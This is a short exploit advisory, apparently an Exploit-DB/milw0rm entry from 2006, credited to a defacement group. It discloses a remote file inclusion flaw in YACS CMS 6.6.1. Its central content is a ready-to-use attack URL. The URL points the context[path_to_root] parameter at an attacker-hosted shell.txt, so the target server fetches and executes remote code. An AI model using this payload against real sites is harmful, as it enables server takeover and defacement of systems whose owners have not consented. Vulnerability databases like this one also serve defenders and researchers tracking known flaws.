YACS CMS 6.6.1 - context[path_to_root] Remote File Inclusion

EDB-ID:

2282


Platform:

PHP

Published:

2006-08-31

##################################### matasanos ###################################
#                    YACS CMS (last version and maybe all) File Inclusion Vulnerability
#
#   affected software: YACS (Yet Another Community System)
#   vendor: yacs . you can donwload it from http://www.yetanothercommunitysystem.com
#   level: Highly Critical (muy critico)
# 
#
#################################################################################### 
#
#
#   http://[target]/[patch]/yacs/articles/article.php?context[path_to_root]=http://url--ataca.org/shell.txt?
#
# 
#
####################################################################################
#
#                                 found by MATASANOS                               
#                               LATIN AMERICAN DEFACERS
#
#
#      recuerdos a antrax,freak,piker,vampi,pennismen,destroy,groxo,vannovax,cvir,mathew

# milw0rm.com [2006-08-31]